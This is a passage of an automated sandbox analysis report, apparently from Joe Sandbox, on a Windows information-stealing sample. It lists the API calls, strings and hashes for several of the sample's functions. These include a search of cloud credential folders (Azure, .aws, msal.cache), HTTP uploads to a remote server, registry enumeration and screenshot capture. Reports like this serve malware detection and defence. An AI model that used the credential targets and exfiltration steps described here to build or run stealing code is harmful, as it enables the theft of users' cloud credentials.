                                                                                                                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                                                                                                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                                                                                                                                • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                                                                                                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,009A2030,?,000003E8), ref: 00414C9A
                                                                                                                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                                                                                                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                                                                                                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                                                                                                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                                                                                                                                • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                                                                                                                                • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                                                                                                                              • memset.MSVCRT ref: 0041517B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                              • API String ID: 4017274736-974132213
                                                                                                                                              • Opcode ID: 017e18e56085ef56c6ba935e0ea78ebc52f6b3913b598829d900a5ada6bf78b8
                                                                                                                                              • Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
                                                                                                                                              • Opcode Fuzzy Hash: 017e18e56085ef56c6ba935e0ea78ebc52f6b3913b598829d900a5ada6bf78b8
                                                                                                                                              • Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A
                                                                                                                                              Function 0040CFF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,0099BC18,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0040D1CE
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,009996E0,0042156C,009996E0,00421568,00000000), ref: 0040D308
                                                                                                                                              • lstrcatA.KERNEL32(?,00421570), ref: 0040D317
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
                                                                                                                                              • lstrcatA.KERNEL32(?,00421574), ref: 0040D339
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
                                                                                                                                              • lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
                                                                                                                                              • lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D390
                                                                                                                                              • lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
                                                                                                                                              • lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
                                                                                                                                              • lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3
                                                                                                                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009996C0,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040D42A
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040D439
                                                                                                                                              • memset.MSVCRT ref: 0040D488
                                                                                                                                                • Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F
                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D4B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1973479514-0
                                                                                                                                              • Opcode ID: 260815953e7bdcd311296984f680e3292da92b19d57fd8316638a455fe1b6f0a
                                                                                                                                              • Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
                                                                                                                                              • Opcode Fuzzy Hash: 260815953e7bdcd311296984f680e3292da92b19d57fd8316638a455fe1b6f0a
                                                                                                                                              • Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A
                                                                                                                                              Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2160 4048d0-404992 call 41aab0 call 404800 call 41aa50 * 5 InternetOpenA StrCmpCA 2175 404994 2160->2175 2176 40499b-40499f 2160->2176 2175->2176 2177 4049a5-404b1d call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 2176->2177 2178 404f1b-404f43 InternetCloseHandle call 41ade0 call 40a210 2176->2178 2177->2178 2264 404b23-404b27 2177->2264 2188 404f82-404ff2 call 418b20 * 2 call 41aab0 call 41ab10 * 8 2178->2188 2189 404f45-404f7d call 41ab30 call 41acc0 call 41abb0 call 41ab10 2178->2189 2189->2188 2265 404b35 2264->2265 2266 404b29-404b33 2264->2266 2267 404b3f-404b72 HttpOpenRequestA 2265->2267 2266->2267 2268 404b78-404e78 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41aa50 call 41ac30 * 2 call 41abb0 call 41ab10 * 2 call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA call 41ade0 HttpSendRequestA 2267->2268 2269 404f0e-404f15 InternetCloseHandle 2267->2269 2380 404e82-404eac InternetReadFile 2268->2380 2269->2178 2381 404eb7-404f09 InternetCloseHandle call 41ab10 2380->2381 2382 404eae-404eb5 2380->2382 2381->2269 2382->2381 2383 404eb9-404ef7 call 41acc0 call 41abb0 call 41ab10 2382->2383 2383->2380
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
                                                                                                                                              • StrCmpCA.SHLWAPI(?,009A2060), ref: 0040498A
                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,009A2110), ref: 00404E38
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404EFD
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404F15
                                                                                                                                              • HttpOpenRequestA.WININET(00000000,009A20D0,?,009A1500,00000000,00000000,00400100,00000000), ref: 00404B65
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404F1F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                              • String ID: "$"$------$------$------
                                                                                                                                              • API String ID: 2402878923-2180234286
                                                                                                                                              • Opcode ID: e4842c7d8528502104debb1bb88ee891ef7e82c5acfdf1f8e8b0186a8169e453
                                                                                                                                              • Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
                                                                                                                                              • Opcode Fuzzy Hash: e4842c7d8528502104debb1bb88ee891ef7e82c5acfdf1f8e8b0186a8169e453
                                                                                                                                              • Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69
                                                                                                                                              Function 004062D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191networkfileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                                                                              • StrCmpCA.SHLWAPI(?,009A2060), ref: 00406353
                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                                                                              • HttpOpenRequestA.WININET(00000000,GET,?,009A1500,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                                                                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040653F
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00406549
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00406553
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                              • String ID: ERROR$ERROR$FUA$GET
                                                                                                                                              • API String ID: 3074848878-1334267432
                                                                                                                                              • Opcode ID: 9660a5b5deb5089f1342debc8d584c2002b2bf9e84fd5657b5695c7b33e20b72
                                                                                                                                              • Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
                                                                                                                                              • Opcode Fuzzy Hash: 9660a5b5deb5089f1342debc8d584c2002b2bf9e84fd5657b5695c7b33e20b72
                                                                                                                                              • Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59
                                                                                                                                              Function 004184B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,0099E248,00000000,00020019,00000000,004205BE), ref: 00418534
                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                                                                                                                              • wsprintfA.USER32 ref: 004185E9
                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                              • String ID: - $%s\%s$?
                                                                                                                                              • API String ID: 3246050789-3278919252
                                                                                                                                              • Opcode ID: 67a84ec0512fa6b24fce244c4bc6482ae5ba36d843be357977d0478a5e12e358
                                                                                                                                              • Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
                                                                                                                                              • Opcode Fuzzy Hash: 67a84ec0512fa6b24fce244c4bc6482ae5ba36d843be357977d0478a5e12e358
                                                                                                                                              • Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9
                                                                                                                                              Function 004191A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateGlobalStream
                                                                                                                                              • String ID: `dAF$`dAF$image/jpeg
                                                                                                                                              • API String ID: 2244384528-2462684518
                                                                                                                                              • Opcode ID: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                                                                                                                              • Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
                                                                                                                                              • Opcode Fuzzy Hash: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                                                                                                                              • Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65
                                                                                                                                              Function 00415760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009996C0,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                                                                                                                                • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
                                                                                                                                                • Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
